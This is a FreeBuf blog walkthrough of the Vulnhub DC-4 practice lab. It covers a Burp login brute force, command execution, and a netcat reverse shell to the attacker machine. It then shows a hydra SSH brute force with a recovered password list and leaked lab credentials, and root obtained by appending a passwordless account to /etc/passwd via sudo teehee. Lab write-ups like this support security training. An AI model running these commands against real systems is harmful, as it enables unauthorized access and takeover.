freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Vulnhub-DC4靶场渗透测试
Vulnhub-DC4靶场渗透测试
开冲 2022-03-31 20:03:38 151612
所属地 吉林省

靶场信息

kali:192.168.123.73

靶机:192.168.123.144

信息收集

端口扫描

<a href="https://imgtg.com/image/b3u7a"><img src="https://i.imgtg.com/2022/03/31/b3u7a.png" alt="b3u7a.png" border="0"></a>

得到80、22端口

目录扫描

<a href="https://imgtg.com/image/b3IHS"><img src="https://i.imgtg.com/2022/03/31/b3IHS.png" alt="b3IHS.png" border="0"></a>

渗透过程

Burp爆破

通过burp爆破得到密码happy(需要burp返回包才可以进去)

<a href="https://imgtg.com/image/b33XN"><img src="https://i.imgtg.com/2022/03/31/b33XN.png" alt="b33XN.png" border="0"></a>

命令执行

看到List Files,应该可以命令执行,通过抓包,执行命令

<a href="https://imgtg.com/image/b3wxC"><img src="https://i.imgtg.com/2022/03/31/b3wxC.png" alt="b3wxC.png" border="0"></a>

电脑版本

<a href="https://imgtg.com/image/bCMJL"><img src="https://i.imgtg.com/2022/03/31/bCMJL.png" alt="bCMJL.png" border="0"></a>

当前工作目录

<a href="https://imgtg.com/image/bCOli"><img src="https://i.imgtg.com/2022/03/31/bCOli.png" alt="bCOli.png" border="0"></a>


反弹SHELL

nc -e /bin/sh 192.168.123.73 4444

<a href="https://imgtg.com/image/bCoBX"><img src="https://i.imgtg.com/2022/03/31/bCoBX.png" alt="bCoBX.png" border="0"></a>

<a href="https://imgtg.com/image/bCqZt"><img src="https://i.imgtg.com/2022/03/31/bCqZt.png" alt="bCqZt.png" border="0"></a>

发现两用户

<a href="https://imgtg.com/image/bC5cx"><img src="https://i.imgtg.com/2022/03/31/bC5cx.png" alt="bC5cx.png" border="0"></a>


爆破SSH密码

用hydra爆破ssh密码

密码在用户jim的目录

/home/jim/backups/old-passwords.bak

将文件复制下来,另存为一个文件,起名为password.txt

hydra -l jim -P password.txt -t 3 ssh://192.168.123.144

<a href="https://imgtg.com/image/bCTMj"><img src="https://i.imgtg.com/2022/03/31/bCTMj.png" alt="bCTMj.png" border="0"></a>

获得用户名-密码:jim-jibril04


SSH连接

ssh jim@192.168.123.144

在共享文件夹的mail发现邮件

<a href="https://imgtg.com/image/bCU7p"><img src="https://i.imgtg.com/2022/03/31/bCU7p.png" alt="bCU7p.png" border="0"></a>

得到charles的ssh密码

连接charles的SSH

teehee提权

sudo -l发现不需要密码就可以使用/use/bin/teehee

使用teehee时又可以临时获得root权限 ,可以创建一个管理员

echo "admin::0:0:::/bin/sh" | sudo teehee -a /etc/passwd

<a href="https://imgtg.com/image/bCWLU"><img src="https://i.imgtg.com/2022/03/31/bCWLU.png" alt="bCWLU.png" border="0"></a>

切换admin就行了

也可以用 crontab提权

参考链接

反弹shell多种姿势

DC4靶场博客


# web安全 # 网络安全技术
本文为 开冲 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
靶场
相关推荐
渗透项目之内网靶场实战(一) 原创
渗透项目之内网靶场实战(一)

Web安全

主要介绍了一个内网项目的实践,从打点到利用到洞穿这个内网的过程,从而进一步真实还原红队的攻击路线和攻击场景。

scriptkiddle

119076围观 2022-04-04

vulnhub系列7——hacksudo 3 原创
vulnhub系列7——hacksudo 3

Web安全

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

热烈的马

134203围观 2022-11-25

hackmyvm系列4——Comingsoon 原创
hackmyvm系列4——Comingsoon

Web安全

生活中的很多烦恼,就是源于我们不能体谅,过分在意了自己的主张,互不理解,互不相让,伤了彼此的心灵。 —— 林徽因

热烈的马

160892围观 2022-11-25

CVE-2022-22965_SpringShell保姆级调试分析
CVE-2022-22965_SpringShell保姆级调试分析

漏洞

【原创】CVE-2022-22965_SpringShell保姆级调试分析,带给你不一样的分析体验!!!

FreeBuf_281742

146600围观 2022-04-16

未授权访问 原创
未授权访问

Web安全

jboss存在未授权访问,通过该漏洞,可以后台管理服务,脚本命令执行系统命令,如反弹shell,wget写webshell文件。

开冲

143280围观  · 1收藏  · 11喜欢 2022-04-02

开冲 LV.5
这家伙太懒了,还未填写个人描述!
  • 18 文章数
  • 17 关注者
vulnstack靶场:ATT&CK攻击-1
2022-06-27
对Linux提权的简单总结[中]
2022-06-13
[VulnHub]hackdale:2靶场记录
2022-05-19
文章目录
靶场信息
    信息收集
      渗透过程
        teehee提权
          参考链接